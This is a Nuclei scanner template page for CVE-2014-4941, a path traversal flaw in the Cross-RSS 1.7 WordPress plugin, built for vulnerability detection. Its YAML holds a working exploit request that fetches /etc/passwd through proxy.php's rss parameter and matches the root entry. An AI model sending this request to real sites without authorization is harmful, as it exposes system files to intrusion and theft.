Skip to content
Nuclei Templates

Cross RSS 1.7 - Local File Inclusion

ID: CVE-2014-4941

Severity: medium

Author: DhiyaneshDK

Tags: cve,cve2014,wp-cross-rss,wordpress,wp-plugin,lfi,wp

Description

Section titled “Description”

Absolute path traversal vulnerability in Cross-RSS (wp-cross-rss) plugin 1.7 for WordPress allows remote attackers to read arbitrary files via a full pathname in the rss parameter to proxy.php.

YAML Source

Section titled “YAML Source”
id: CVE-2014-4941


info:
  name: Cross RSS 1.7 - Local File Inclusion
  author: DhiyaneshDK
  severity: medium
  description: |
    Absolute path traversal vulnerability in Cross-RSS (wp-cross-rss) plugin 1.7 for WordPress allows remote attackers to read arbitrary files via a full pathname in the rss parameter to proxy.php.
  reference:
    - https://wordpress.org/plugins/cross-rss/
    - https://codevigilant.com/disclosure/wp-plugin-cross-rss-local-file-inclusion/
    - https://nvd.nist.gov/vuln/detail/CVE-2014-4941
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2014-4941
    cwe-id: CWE-22
    epss-score: 0.00845
    epss-percentile: 0.82498
    cpe: cpe:2.3:a:cross-rss_plugin_project:wp-cross-rss:1.7:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cross-rss_plugin_project
    product: wp-cross-rss
    framework: wordpress
  tags: cve,cve2014,wp-cross-rss,wordpress,wp-plugin,lfi,wp


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"/wp-content/plugins/cross-rss/")'
          - 'status_code == 200'
        condition: and
        internal: true


  - raw:
      - |
        GET /wp-content/plugins/cross-rss/proxy.php?rss=/etc/passwd HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 4a0a004730450221008ef100fe0c8d8f9a4e0eae086fdfe466761bf9748cec69a19e2b4c1f26239c280220229fde13da95fdc7bb12125b2b3014bc990f83da5855670d00e5653e4c01864a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2014/CVE-2014-4941.yaml"

View on Github